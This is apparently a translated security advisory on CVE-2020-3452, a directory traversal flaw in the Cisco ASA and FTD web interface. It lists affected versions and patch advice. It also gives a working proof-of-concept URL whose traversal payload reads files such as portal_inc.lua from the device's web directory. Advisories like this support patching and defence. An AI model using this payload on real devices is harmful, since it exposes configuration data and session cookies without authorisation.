warn
Do not use the content mentioned in this article to violate the law .
This article does not provide any guarantee
1. Vulnerability description
Cisco has officially released a risk notification of directory traversal leading to arbitrary file reading in the web interface of Cisco ASA software and FTD software, and the vulnerability number is CVE-2020-3452. An attacker can only view files in the web directory, and cannot access files outside the web directory through this vulnerability. This vulnerability can view configuration information, cookies, etc. of webVpn devices.
Vulnerability level: Medium critical .
2. The affected version
- Cisco ASA:<= 9.6
- Cisco ASA : 9.7, 9.8, 9.9, 9.10, 9.12, 9.13, 9.14
- Cisco FTD:6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0
3. Vulnerability recurrence
The poc is as follows:
https://x.x.x.x/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
4. Vulnerability Repair
Install Cisco ASA/TFD
the latest patch and perform patch upgrade.
warn
Do not use the content mentioned in this article to violate the law .
This article does not provide any guarantee